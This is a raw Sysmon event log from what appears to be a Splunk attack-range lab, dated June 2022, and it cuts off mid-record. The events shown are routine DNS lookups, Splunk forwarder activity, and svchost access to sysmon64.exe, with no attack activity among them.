354300x8000000000000000218095Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:48.352{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local65137-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domain 354300x8000000000000000218094Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:48.351{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local65137- 354300x8000000000000000218093Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:48.351{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local65137- 354300x8000000000000000218092Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:48.351{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local65137-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domain 354300x8000000000000000218091Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:48.350{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local65531-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domain 354300x8000000000000000218090Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:48.350{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local65531- 354300x8000000000000000218089Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:48.350{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local60935-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000218088Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:48.349{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local60935-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000218087Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:48.349{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local65531- 354300x8000000000000000218086Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:48.349{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local65531-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domain 23542300x8000000000000000218097Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:51.885{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF743C10DA05B759DBB4222DA45A27EF,SHA256=625F078DCD1CD62FA179AF8D06182F81D007E46E6AB9108BA61C41ADA88AD0E0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045077Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:51.734{0A5DF930-193B-629A-3C07-000000006002}824916C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045076Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:51.468{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-193B-629A-3C07-000000006002}824C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045075Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:51.468{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045074Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:51.468{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045073Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:51.468{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045072Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:51.468{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045071Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:51.468{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045070Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:51.468{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045069Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:51.468{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045068Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:51.468{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045067Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:51.468{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045066Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:51.468{0A5DF930-E35B-6299-0500-000000006002}412428C:\Windows\system32\csrss.exe{0A5DF930-193B-629A-3C07-000000006002}824C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000045065Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:51.468{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-193B-629A-3C07-000000006002}824C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000045064Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:51.471{0A5DF930-193B-629A-3C07-000000006002}824C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000045063Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:51.468{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=841652EF560F1666942D711EEF1D8A2A,SHA256=7E2CA58BF46A4BC9940AEF41A34631514CEC90511FD38B5E774938994F47A2C8,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000045062Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:48.784{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52400-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000218098Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:52.985{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CE66EDAA2244D4A8CA806A74F8DBD40,SHA256=95F59C3EC0E73A959339D80B9E1FAD983DCC1DE2001AD03EFF37FE9B69F20CE3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045091Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:52.499{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-193C-629A-3D07-000000006002}1508C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045090Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:52.499{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045089Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:52.499{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045088Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:52.499{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045087Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:52.499{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045086Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:52.499{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045085Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 